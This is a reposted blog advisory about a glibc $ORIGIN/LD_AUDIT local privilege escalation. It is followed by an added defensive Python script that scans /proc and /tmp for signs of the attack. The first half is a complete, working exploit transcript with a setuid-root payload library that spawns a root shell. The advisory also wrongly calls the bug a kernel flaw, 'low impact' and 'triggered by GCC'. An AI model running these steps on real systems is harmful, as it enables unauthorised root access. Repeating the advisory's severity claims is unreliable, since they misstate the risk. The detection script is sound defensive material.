Linux 2.6 kernel local privilege escalation

It is possible to exploit this flaw to execute arbitrary code as root.

Please note, this is a low impact vulnerability that is only of interest to security professionals and system administrators. End users do not need to be concerned.

Exploitation would look like the following.

# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target

# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# Remove the directory previously created.
$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)

Vulnerability fix (this is a vulnerability triggered by GCC):

Update: glibc
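Besides updating glibc, an administrator may want to check a host for the two artefacts the transcript above leaves behind: a hard link to a setuid-root binary inside a world-writable directory (the ln step), and a process whose environment still carries LD_AUDIT set to the literal string $ORIGIN (the root shell spawned by the payload inherits that variable). The script below is an added example written for this page; it is not part of the original advisory or of the blog post. It assumes a Linux host with /proc mounted and, for the sysctl check, the path /proc/sys/fs/protected_hardlinks (present on kernels from 3.6 onward, where fs.protected_hardlinks=1 makes the kernel refuse hard links to files the caller does not own). The sample environ blob and stat values used in the self-check are constructed.

```python
"""Host checks against the $ORIGIN / LD_AUDIT abuse pattern (added example)."""
import os
import stat

# Loader variables in which glibc's ld.so expands $ORIGIN.
LOADER_VARS = ("LD_AUDIT", "LD_PRELOAD", "LD_LIBRARY_PATH")


def parse_environ(raw: bytes) -> dict:
    """Parse the NUL-separated KEY=VALUE blob found in /proc/<pid>/environ."""
    env = {}
    for entry in raw.split(b"\0"):
        if not entry or b"=" not in entry:
            continue
        key, _, value = entry.partition(b"=")
        env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def suspicious_loader_vars(env: dict) -> list:
    """Return loader variables whose value contains $ORIGIN.

    A legitimate audit module or preload is given as a path; a bare $ORIGIN
    points the loader at the directory of the executable, which is what the
    transcript abuses.
    """
    return sorted(k for k in LOADER_VARS if "$ORIGIN" in env.get(k, ""))


def scan_environ(proc_root: str = "/proc") -> dict:
    """Map pid -> flagged variables for every process environment we can read."""
    hits = {}
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, pid, "environ"), "rb") as fh:
                flagged = suspicious_loader_vars(parse_environ(fh.read()))
        except OSError:  # process exited, or its environ is not readable by us
            continue
        if flagged:
            hits[int(pid)] = flagged
    return hits


def looks_like_setuid_hardlink(mode: int, nlink: int, uid: int) -> bool:
    """True for a regular, setuid, root-owned file that has more than one link.

    Inside /tmp that combination almost always means someone hard-linked a
    system binary there, as the transcript does with /bin/ping.
    """
    return (stat.S_ISREG(mode) and nlink >= 2
            and uid == 0 and bool(mode & stat.S_ISUID))


def hardlinks_to_setuid(root: str = "/tmp") -> list:
    """Walk root and list paths that look like hard links to setuid-root binaries."""
    found = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if looks_like_setuid_hardlink(st.st_mode, st.st_nlink, st.st_uid):
                found.append(path)
    return sorted(found)


def protected_hardlinks_enabled(path: str = "/proc/sys/fs/protected_hardlinks") -> bool:
    """Read the sysctl; False when it is 0 or the kernel predates it (no such file)."""
    try:
        with open(path) as fh:
            return fh.read().strip() == "1"
    except OSError:
        return False


if __name__ == "__main__":
    # Constructed sample: what /proc/<pid>/environ of the spawned root shell would contain.
    sample = b"PATH=/bin\0LD_AUDIT=$ORIGIN\0HOME=/home/taviso\0"
    print("sample environ flags:", suspicious_loader_vars(parse_environ(sample)))
    print("fs.protected_hardlinks enabled:", protected_hardlinks_enabled())
    print("live processes with $ORIGIN in loader vars:", scan_environ())
    print("hard links to setuid-root files under /tmp:", hardlinks_to_setuid())
```

Both scans are heuristics for a post-incident look, not a substitute for the glibc update: the environment check only sees processes that are still running, and a hard link only shows up while the attacker's directory still exists (the transcript deletes it right after opening the descriptor).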

This article is reposted from the 51CTO blog of itnihao; original link: http://blog.51cto.com/itnihao/757187. To republish, please contact the original author.